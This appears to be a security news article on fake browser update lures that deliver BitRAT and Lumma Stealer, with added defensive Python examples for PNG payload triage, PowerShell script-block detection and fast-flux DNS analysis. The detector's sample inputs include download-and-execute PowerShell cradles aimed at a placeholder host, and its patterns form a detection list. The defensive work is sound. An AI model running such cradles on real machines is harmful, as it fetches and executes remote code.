Fake web browser updates are being used to deliver remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2).
"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity firm eSentire said in a new report. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."
The attack chain begins when a potential target visits a booby-trapped website containing JavaScript code that redirects the user to a bogus browser update page ("chatgpt-app[.]cloud").
The page the user lands on embeds a download link to a ZIP archive ("Update.zip") hosted on Discord, which is downloaded automatically to the victim's machine. No browser delivers its own updates as a ZIP file fetched from a chat platform's CDN, which is the tell here.
Discord is a well-worn attack vector: a recent Bitdefender analysis uncovered more than 50,000 dangerous links on the platform distributing malware, phishing campaigns, and spam over the past six months.
Inside the ZIP archive is a JavaScript file ("Update.js") that triggers the execution of PowerShell scripts responsible for retrieving additional payloads, including BitRAT and Lumma Stealer, from a remote server in the form of PNG image files.
Also retrieved this way are PowerShell scripts that establish persistence and a .NET-based loader used to launch the final-stage malware. eSentire postulated that the loader is likely advertised as a "malware delivery service," given that the same loader is used to deploy both BitRAT and Lumma Stealer.
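The article says the second-stage payloads come down as PNG image files but does not say how they are packed inside them. A file that claims to be a PNG can still be triaged structurally without knowing the packing: walk the chunk list, verify each chunk's CRC, and check whether anything follows IEND (a payload appended after IEND still renders as a valid image in most viewers, which is exactly why it is a popular hiding place). The following is an added example, not eSentire's tooling and not anything recovered from the campaign. It builds a valid 1x1 PNG in memory as a constructed sample, then triages a clean copy, a copy with bytes appended after IEND, and a plain text blob carrying a .png name; every name and sample in it is an assumption.

```python
import struct
import zlib

# Added example, not from the article or eSentire; sample files are constructed in memory.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def build_minimal_png() -> bytes:
    """Construct a valid 1x1 RGB PNG (constructed sample, nothing to do with the campaign)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, RGB
    scanline = b"\x00" + b"\xff\x00\x00"                   # filter byte + one red pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(scanline)) + _chunk(b"IEND", b""))


def triage_png(blob: bytes) -> dict:
    """Walk the chunk list of a PNG-looking blob and report structural anomalies.

    verdict is 'not_png' (no signature), 'suspicious' (truncated chunk list,
    bad CRC, or bytes after IEND) or 'clean'. Decoders stop at IEND, so data
    appended after it is invisible to an image viewer but not to this check.
    """
    report = {"valid_signature": blob.startswith(PNG_SIGNATURE), "chunks": [],
              "bad_crc": [], "trailing_bytes": 0, "verdict": "clean"}
    if not report["valid_signature"]:
        report["verdict"] = "not_png"
        return report
    pos, saw_iend = len(PNG_SIGNATURE), False
    while pos + 12 <= len(blob) and not saw_iend:
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        if pos + 12 + length > len(blob):
            break                                   # chunk runs past end of file
        data = blob[pos + 8:pos + 8 + length]
        (stored_crc,) = struct.unpack(">I", blob[pos + 8 + length:pos + 12 + length])
        name = ctype.decode("latin-1")
        report["chunks"].append(name)
        if (zlib.crc32(ctype + data) & 0xFFFFFFFF) != stored_crc:
            report["bad_crc"].append(name)
        pos += 12 + length
        saw_iend = ctype == b"IEND"
    report["trailing_bytes"] = len(blob) - pos if saw_iend else 0
    if not saw_iend or report["bad_crc"] or report["trailing_bytes"]:
        report["verdict"] = "suspicious"
    return report


# Constructed samples: a clean image, the same image with a blob appended after
# IEND (stand-in for a tucked-away payload), and a text script renamed to .png.
CLEAN_PNG = build_minimal_png()
PNG_WITH_TAIL = CLEAN_PNG + b"MZ\x90\x00" + b"\x00" * 60
FAKE_PNG = b"powershell -nop -w hidden -c ...".ljust(64, b"\x00")

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN_PNG), ("appended", PNG_WITH_TAIL), ("renamed", FAKE_PNG)]:
        print(label, triage_png(blob))
```

The check deliberately does not try to decompress or interpret the payload; its job is to say "this is not just an image" so the file gets pulled for proper analysis. A steganographic payload hidden inside legitimate IDAT data would pass it, so treat a clean verdict as "no cheap tell found" rather than "benign".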
BitRAT is a feature-rich RAT that lets attackers harvest data, mine cryptocurrency, download additional binaries, and remotely commandeer infected hosts. Lumma Stealer, a commodity stealer sold for $250 to $1,000 per month since August 2022, can capture information from web browsers, crypto wallets, and other sensitive sources.
"The fake browser update lure has become common amongst attackers as a means of entry to a device or network," the company said, adding that it "displays the operator's ability to leverage trusted names to maximize reach and impact."
While such attacks typically rely on drive-by downloads and malvertising, ReliaQuest, in a report published last week, said it discovered a new variant of the ClearFake campaign that tricks users into copying, pasting, and manually executing malicious PowerShell code under the pretext of a browser update.
Specifically, the malicious website claims that "something went wrong while displaying this webpage" and instructs the visitor to install a root certificate to fix the problem by following a series of steps, which involve copying obfuscated PowerShell code and running it in a PowerShell terminal. Because the browser never downloads a file, nothing is written with a mark-of-the-web and browser download protections never see it; the user's own console session does the fetching.
"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the company said.
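Since the ClearFake variant above arrives by paste rather than by download, the useful telemetry is PowerShell script block logging (Event ID 4104, ScriptBlockText) rather than the browser's download history. The following added example, which is not ReliaQuest's detection content, scores a script block's text against the behaviours the report lists (clearing the DNS cache, showing a message box, downloading further PowerShell) plus the usual in-memory execution and hidden-window switches, decoding an -EncodedCommand argument first so obfuscation by encoding does not blind the patterns. The indicator regexes, the flagging thresholds and the sample script blocks are all assumptions constructed for the example; example.invalid never resolves.

```python
import base64
import re

# Added example, not ReliaQuest's detection content. The indicator regexes are
# generic stand-ins for the behaviours the report describes, not campaign signatures.
INDICATORS = [
    ("dns_cache_clear", r"Clear-DnsClientCache|ipconfig(\.exe)?\s+/flushdns"),
    ("message_box", r"\[System\.Windows\.(Forms\.)?MessageBox\]::Show"
                    r"|Add-Type\s+-AssemblyName\s+(System\.Windows\.Forms|PresentationFramework)"),
    ("download_cradle", r"Invoke-WebRequest|\biwr\b|\bcurl\b|Invoke-RestMethod|\birm\b"
                        r"|DownloadString|DownloadFile|DownloadData"),
    ("in_memory_exec", r"Invoke-Expression|\biex\b"),
    ("hidden_window", r"-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass|ExecutionPolicy\s+Bypass"),
    ("root_cert_install", r"certutil(\.exe)?\s+-addstore|Import-Certificate|X509Store"),
]

ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str) -> str:
    """Replace an -EncodedCommand base64 argument with its UTF-16LE plaintext so
    the indicator patterns see the real command. Leaves text unchanged on failure."""
    m = ENCODED_ARG.search(text)
    if not m:
        return text
    try:
        plain = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return text
    return text[:m.start(1)] + plain + text[m.end(1):]


def triage_script_block(text: str) -> dict:
    """Score one PowerShell script block (e.g. the ScriptBlockText of Event ID 4104).

    flagged when three or more behaviour categories appear together, or when a
    download cradle and in-memory execution appear together, which is the minimal
    'paste this into PowerShell' shape. Thresholds are assumptions for the example.
    """
    decoded = decode_encoded_command(text)
    hits = [name for name, rx in INDICATORS if re.search(rx, decoded, re.I)]
    flagged = len(hits) >= 3 or {"download_cradle", "in_memory_exec"} <= set(hits)
    return {"hits": hits, "flagged": flagged, "decoded": decoded}


# Constructed script blocks for the example; example.invalid never resolves.
_ENC = base64.b64encode("iwr http://example.invalid/a.ps1 | iex".encode("utf-16-le")).decode()
SAMPLES = {
    "benign_admin": "Get-Process | Where-Object CPU -gt 100 | Sort-Object CPU -Descending",
    "flush_only": "ipconfig /flushdns",
    "lure_like": ("Clear-DnsClientCache; Add-Type -AssemblyName PresentationFramework; "
                  "[System.Windows.MessageBox]::Show('Root certificate installed'); "
                  "iex (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')"),
    "encoded": "powershell -nop -w hidden -enc " + _ENC,
}

if __name__ == "__main__":
    for label, block in SAMPLES.items():
        result = triage_script_block(block)
        print(f"{label:13} flagged={result['flagged']} hits={result['hits']}")
```

A lone `ipconfig /flushdns` is everyday helpdesk activity and stays unflagged; it is the combination, in one block, of cache clearing, a reassuring message box and a download cradle that matches the lure. In a real deployment the same logic runs over 4104 events with the parent process (explorer.exe launching a console the user typed into, rather than a scheduled task or management agent) as additional context.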
According to information shared by the firm, Lumma Stealer emerged as one of the most prevalent information stealers in 2023, alongside RedLine and Raccoon.
"The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023," it noted. "LummaC2's rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection."
The development comes as the AhnLab Security Intelligence Center (ASEC) disclosed details of a new campaign that uses webhards (short for web hard drive) as a conduit to distribute malicious installers for adult games and cracked versions of Microsoft Office, ultimately deploying a variety of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains involving websites offering pirated software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, both offered as a pay-per-install (PPI) service for other cybercriminals to deliver their own payloads.
It also follows new findings from Silent Push about CryptoChameleon's "almost exclusive use" of DNSPod[.]com nameservers to support its phishing kit infrastructure. DNSPod, part of the Chinese company Tencent, has a history of providing services to malicious bulletproof hosting operators.
"CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name," the company said.
"Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures, and significantly reduces the operational value of legacy point-in-time IOCs."
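Fast flux as described above shows up plainly in passive DNS: one name resolves to many addresses spread across many networks with short TTLs, and an IP indicator captured at one point in time goes stale as soon as the next rotation lands. The added example below, which is not Silent Push's method or data, summarises constructed passive-DNS observations per domain, applies assumed fast-flux thresholds, and then pivots flagged domains to the nameservers serving them, the durable indicator the report points to. Domains, addresses, nameserver names and thresholds are all constructed for the example.

```python
import ipaddress
import statistics
from collections import defaultdict

# Added example, not Silent Push's method or data. Observations are constructed
# passive-DNS style rows: (domain, A record, TTL seconds, authoritative nameserver).
OBSERVATIONS = [
    ("secure-login.invalid", "203.0.113.10", 60, "ns1.example-dns.invalid"),
    ("secure-login.invalid", "198.51.100.22", 60, "ns1.example-dns.invalid"),
    ("secure-login.invalid", "192.0.2.77", 60, "ns2.example-dns.invalid"),
    ("secure-login.invalid", "203.0.113.200", 60, "ns1.example-dns.invalid"),
    ("secure-login.invalid", "198.51.100.130", 120, "ns2.example-dns.invalid"),
    ("secure-login.invalid", "192.0.2.9", 60, "ns1.example-dns.invalid"),
    ("secure-login.invalid", "203.0.113.10", 60, "ns1.example-dns.invalid"),
    ("corp-site.invalid", "203.0.113.50", 3600, "ns1.corp.invalid"),
    ("corp-site.invalid", "203.0.113.51", 3600, "ns1.corp.invalid"),
    ("cdn-asset.invalid", "198.51.100.5", 60, "ns1.cdn.invalid"),
    ("cdn-asset.invalid", "198.51.100.6", 60, "ns1.cdn.invalid"),
    ("cdn-asset.invalid", "192.0.2.5", 60, "ns1.cdn.invalid"),
]

# Assumed thresholds: many distinct addresses, spread over several /24s, with
# short TTLs. A CDN can look similar, so this is a triage signal, not a verdict.
MIN_IPS, MIN_PREFIXES, MAX_MEDIAN_TTL = 5, 3, 300


def is_fast_flux(summary: dict) -> bool:
    return (summary["distinct_ips"] >= MIN_IPS
            and summary["distinct_prefixes"] >= MIN_PREFIXES
            and summary["median_ttl"] <= MAX_MEDIAN_TTL)


def summarize(observations) -> dict:
    """Aggregate per domain: distinct IPs, distinct /24s, median TTL, nameservers, flag."""
    rows = defaultdict(list)
    for domain, ip, ttl, ns in observations:
        rows[domain].append((ip, ttl, ns))
    out = {}
    for domain, entries in rows.items():
        ips = {ip for ip, _, _ in entries}
        prefixes = {str(ipaddress.ip_network(f"{ip}/24", strict=False)) for ip in ips}
        s = {
            "distinct_ips": len(ips),
            "distinct_prefixes": len(prefixes),
            "median_ttl": statistics.median(ttl for _, ttl, _ in entries),
            "nameservers": sorted({ns for _, _, ns in entries}),
        }
        s["flagged"] = is_fast_flux(s)
        out[domain] = s
    return out


def nameserver_pivot(summaries: dict, only_flagged: bool = True) -> dict:
    """Map nameserver -> domains it serves. Addresses rotate out; the nameserver
    the operator keeps reusing is the indicator that survives the rotation."""
    pivot = defaultdict(set)
    for domain, s in summaries.items():
        if only_flagged and not s["flagged"]:
            continue
        for ns in s["nameservers"]:
            pivot[ns].add(domain)
    return {ns: sorted(domains) for ns, domains in pivot.items()}


if __name__ == "__main__":
    summaries = summarize(OBSERVATIONS)
    for domain, s in summaries.items():
        print(domain, s)
    print("pivot:", nameserver_pivot(summaries))
```

The practical consequence for blocking is the one the quote draws: an allow/deny list keyed on the resolved addresses of a fast-flux domain is stale within a TTL or two, while the domain itself and the nameservers it keeps returning to are worth hunting on. The CDN-shaped sample is there as a reminder that short TTLs and multiple networks alone are not proof; the thresholds are deliberately conservative and should be tuned against your own resolver data.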